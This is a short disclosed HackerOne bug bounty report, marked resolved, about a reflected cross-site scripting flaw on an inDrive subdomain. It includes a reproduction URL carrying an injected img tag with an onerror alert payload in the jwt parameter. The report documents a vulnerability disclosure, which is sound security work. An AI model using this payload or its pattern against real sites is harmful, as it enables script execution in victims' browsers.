#3 XSS on watchdocs.indriverapp.com

Disclosed: 2024-04-11 08:33:03 By maxdha To indrive

Low

Vulnerability Details

## Summary: Found an XSS ## Steps To Reproduce: 1. Go to https://watchdocs.indriverapp.com/webview/v1/transport-change?phone=██████&token=█████████&service=intercity3&jwt=fw%22%3E%3Cimg%20src=fwa%20onerror=alert(1)%3E ## Supporting Material/References: ████ ## Impact Execute Javascript on any victim browser

Actions

View on HackerOne

Report Stats

Report ID: 2028265
State: Closed
Substate: resolved
Upvotes: 62

#3 XSS on watchdocs.indriverapp.com

Vulnerability Details

Actions

Report Stats

Share this report